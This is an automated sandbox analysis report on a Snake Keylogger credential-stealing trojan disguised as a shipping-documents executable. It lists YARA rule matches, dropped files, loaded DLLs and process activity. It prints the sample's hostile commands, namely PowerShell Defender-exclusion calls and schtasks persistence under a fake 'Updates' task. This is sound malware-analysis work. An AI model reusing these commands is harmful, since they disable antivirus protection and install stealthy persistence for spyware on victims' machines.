              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000014.00000002.3702397792.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: PKjWaa.exe PID: 7948, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: MARCH SHIPMENT PLAN DOCS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: PKjWaa.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
              Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, -----.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, -----.csBase64 encoded string: 'v0ltr/3dlbbx6irPTVKppc2pWh/8WgMBIACn2VCCzUsYJe8sqS1U2gQ1pbwsMcX0'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, -----.csBase64 encoded string: 'v0ltr/3dlbbx6irPTVKppc2pWh/8WgMBIACn2VCCzUsYJe8sqS1U2gQ1pbwsMcX0'
              Source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, -----.csBase64 encoded string: 'v0ltr/3dlbbx6irPTVKppc2pWh/8WgMBIACn2VCCzUsYJe8sqS1U2gQ1pbwsMcX0'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nXBoW3ckpU9SC4eyo6.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nXBoW3ckpU9SC4eyo6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nXBoW3ckpU9SC4eyo6.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nfoiYwMtQAOK6pF4db.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nfoiYwMtQAOK6pF4db.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@3/3
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeFile created: C:\Users\user\AppData\Roaming\PKjWaa.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeMutant created: NULL
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeMutant created: \Sessions\1\BaseNamedObjects\VKjkQmghZsvftylZdGL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4184:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4852:120:WilError_03
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4DEC.tmpJump to behavior
              Source: MARCH SHIPMENT PLAN DOCS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: MARCH SHIPMENT PLAN DOCS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000336C000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000331C000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000332C000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000335F000.00000004.00000800.00020000.00000000.sdmp, MARCH SHIPMENT PLAN DOCS.exe, 0000000A.00000002.3706006228.000000000333A000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002EFC000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002F3C000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002EEC000.00000004.00000800.00020000.00000000.sdmp, PKjWaa.exe, 00000014.00000002.3705314207.0000000002F30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: MARCH SHIPMENT PLAN DOCS.exeVirustotal: Detection: 52%
              Source: MARCH SHIPMENT PLAN DOCS.exeReversingLabs: Detection: 44%
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeFile read: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PKjWaa.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\PKjWaa.exe C:\Users\user\AppData\Roaming\PKjWaa.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp5FFD.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess created: C:\Users\user\AppData\Roaming\PKjWaa.exe "C:\Users\user\AppData\Roaming\PKjWaa.exe"
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PKjWaa.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp4DEC.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeProcess created: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe "C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PKjWaa" /XML "C:\Users\user\AppData\Local\Temp\tmp5FFD.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeProcess created: C:\Users\user\AppData\Roaming\PKjWaa.exe "C:\Users\user\AppData\Roaming\PKjWaa.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
